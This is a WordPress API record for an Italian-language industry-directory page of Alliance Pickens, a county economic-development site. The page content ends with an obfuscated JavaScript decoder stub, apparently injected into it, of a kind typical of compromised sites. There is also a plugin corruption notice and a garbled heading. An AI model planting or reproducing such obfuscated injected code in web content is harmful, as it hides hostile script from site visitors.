{"id":6007,"date":"2020-10-28T14:29:47","date_gmt":"2020-10-28T14:29:47","guid":{"rendered":"http:\/\/alliancepickens.com\/elenco-di-settore\/"},"modified":"2020-12-09T20:37:36","modified_gmt":"2020-12-09T20:37:36","slug":"elenco-di-settore","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/it\/industrie-esistenti\/elenco-di-settore\/","title":{"rendered":"Elenco di settore"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]I produttori di Pickens County servono clienti in tutti gli Stati Uniti e in tutto il mondo. Le aziende locali sono coinvolte in una variet\u00e0 di importanti settori industriali, dall&#8217;automotive ai dispositivi medici all&#8217;industria aerospaziale. Inoltre, la produzione avanzata della contea di Pickens, la lavorazione avanzata dei metalli, la produzione chimica e tessile, la plastica e i compositi, i dispositivi speciali e le operazioni di sviluppo software forniscono servizi di supporto vitale nella contea di Pickens e oltre.<\/p>\n<p>Se la tua azienda \u00e8 interessata a trasferirsi o espandersi nella contea di Pickens e desideri saperne di pi\u00f9 su come le aziende locali possono supportare la tua attivit\u00e0, contatta <a href=\"http:\/\/alliancepickens.com\/it\/chi-siamo\/#contact_directions\">il nostro ufficio.<\/a>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In questa sezione&#8221; nav_menu=&#8221;20&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<div>Attention: The internal data of table \u201c11\u201d is corrupted!<\/div>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/Industry-Directory-2020-10-22.csv\" target=\"_blank\" rel=\"noopener noreferrer\">Scarica directory<i class=\"fas fa-download\"><\/i><\/a>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][\/vc_column_inner][\/vc_row_inner][vc_empty_space height=&#8221;80px&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">Ulteriori informazioni sui settori esistenti<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;20&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Pronto per iniziare?<\/h1>\n<h2>Bisogno di sottolinea<\/h2>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Contatta il nostro team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]I produttori di Pickens County servono clienti in tutti gli Stati Uniti e in tutto il mondo. Le aziende locali sono coinvolte in una variet\u00e0 di importanti settori industriali, dall&#8217;automotive ai dispositivi medici all&#8217;industria aerospaziale. Inoltre, la produzione avanzata della contea di Pickens, la lavorazione avanzata dei metalli, la produzione chimica e tessile,&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":8577,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6007","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Elenco di settore - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/it\/industrie-esistenti\/elenco-di-settore\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Elenco di settore - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]I produttori di Pickens County servono clienti in tutti gli Stati Uniti e in tutto il mondo. Le aziende locali sono coinvolte in una variet\u00e0 di importanti settori industriali, dall&#8217;automotive ai dispositivi medici all&#8217;industria aerospaziale. Inoltre, la produzione avanzata della contea di Pickens, la lavorazione avanzata dei metalli, la produzione chimica e tessile,&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/it\/industrie-esistenti\/elenco-di-settore\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-09T20:37:36+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/industrie-esistenti\\\/elenco-di-settore\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/industrie-esistenti\\\/elenco-di-settore\\\/\",\"name\":\"Elenco di settore - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/#website\"},\"datePublished\":\"2020-10-28T14:29:47+00:00\",\"dateModified\":\"2020-12-09T20:37:36+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/industrie-esistenti\\\/elenco-di-settore\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/it\\\/industrie-esistenti\\\/elenco-di-settore\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/industrie-esistenti\\\/elenco-di-settore\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Industrie esistenti\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/industrie-esistenti\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Elenco di settore\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Elenco di settore - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/it\/industrie-esistenti\/elenco-di-settore\/","og_locale":"it_IT","og_type":"article","og_title":"Elenco di settore - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]I produttori di Pickens County servono clienti in tutti gli Stati Uniti e in tutto il mondo. Le aziende locali sono coinvolte in una variet\u00e0 di importanti settori industriali, dall&#8217;automotive ai dispositivi medici all&#8217;industria aerospaziale. Inoltre, la produzione avanzata della contea di Pickens, la lavorazione avanzata dei metalli, la produzione chimica e tessile,&hellip;","og_url":"https:\/\/alliancepickens.com\/it\/industrie-esistenti\/elenco-di-settore\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-09T20:37:36+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/it\/industrie-esistenti\/elenco-di-settore\/","url":"https:\/\/alliancepickens.com\/it\/industrie-esistenti\/elenco-di-settore\/","name":"Elenco di settore - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/it\/#website"},"datePublished":"2020-10-28T14:29:47+00:00","dateModified":"2020-12-09T20:37:36+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/it\/industrie-esistenti\/elenco-di-settore\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/it\/industrie-esistenti\/elenco-di-settore\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/it\/industrie-esistenti\/elenco-di-settore\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/it\/"},{"@type":"ListItem","position":2,"name":"Industrie esistenti","item":"https:\/\/alliancepickens.com\/it\/industrie-esistenti\/"},{"@type":"ListItem","position":3,"name":"Elenco di settore"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/it\/#website","url":"https:\/\/alliancepickens.com\/it\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages\/6007","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/comments?post=6007"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages\/6007\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages\/8577"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/media?parent=6007"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}